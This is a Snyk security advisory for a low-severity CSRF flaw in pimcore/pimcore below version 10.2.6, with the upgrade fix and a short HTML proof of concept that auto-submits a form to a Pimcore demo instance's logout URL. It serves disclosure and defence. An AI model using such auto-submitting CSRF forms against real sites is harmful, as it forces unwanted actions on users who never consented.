Cross-site Request Forgery (CSRF) Affecting pimcore/pimcore package, versions <10.2.6


0.0
medium

Snyk CVSS

    Exploit Maturity Proof of concept
    Attack Complexity Low
    User Interaction Required
Expand this section
NVD
4.3 medium

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-PHP-PIMCOREPIMCORE-2314879
  • published 10 Dec 2021
  • disclosed 10 Dec 2021
  • credit Chau Minh Khanh

How to fix?

Upgrade pimcore/pimcore to version 10.2.6 or higher.

Overview

pimcore/pimcore is a content & product management framework (CMS/PIM/E-Commerce).

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF). An attacker is able to log a user out if a logged-in user visits the attacker's website.

PoC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.pimcore.fun/admin/logout">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

References